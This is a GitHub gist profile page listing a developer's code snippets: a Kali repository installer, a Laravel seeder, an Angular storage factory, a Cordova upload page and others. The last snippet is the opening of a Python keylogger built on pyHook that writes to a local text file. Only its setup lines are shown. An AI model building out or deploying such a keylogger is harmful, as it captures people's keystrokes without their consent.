Skip to content

Instantly share code, notes, and snippets.

View mustafat0k's full-sized avatar
🚀
Go

Mustafa mustafat0k

🚀
Go
View GitHub Profile
@mustafat0k
mustafat0k / .py
Created January 10, 2017 15:52
Linux için Kali repolarını çağırmak. Katoolin
#!/usr/bin/python
import os
import sys, traceback
def main():
try:
print ('''
$$\ $$\ $$\ $$\ $$\
<?php
class CountriesTableSeeder extends Seeder {
public function run()
{
Country::insert([
[
'long_name' => 'Afghanistan',
'short_name' => 'AF',
@mustafat0k
mustafat0k / .html
Created December 29, 2016 10:18
Panel bilgileri
id 7
title asfasdafsd
postalcode asdfasdf
stars 2
object_type_id 1
address asfasffd
undertitle asdfasdf
email [email protected]
content
brief_description adsasdasd
@mustafat0k
mustafat0k / .js
Created November 16, 2016 08:38 — forked from Alexintosh/$localstorage
Angular factory for local storage
.factory('$localstorage', ['$window', function($window) {
return {
set: function(key, value) {
$window.localStorage[key] = value;
},
get: function(key, defaultValue) {
return $window.localStorage[key] || false;
},
setObject: function(key, value) {
$window.localStorage[key] = JSON.stringify(value);
@mustafat0k
mustafat0k / .py
Created November 15, 2016 05:47
Sublime text bootstrap plugin
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
@mustafat0k
mustafat0k / .html Cordova Camera Plugin Cordova plugin camera foto cek kayit et server e jquery ajax ile yükle cordova-plugin-camera upload jquery ajax to server request
<!DOCTYPE html>
<!-- Aysad Kozanoglu -->
<html>
<head>
<title>foto cek</title>
<style>
html {
-webkit-user-select: none;
}
</style>
@mustafat0k
mustafat0k / .py
Last active March 9, 2019 16:06
Python Keylogger
import pyHook
import pythoncom
import sys
class dinlensek:
def __init__(self):
exitKey="4"
adres="C:\kayit.txt" #acılacak txt dosyasının adresi
self.exitKey= exitKey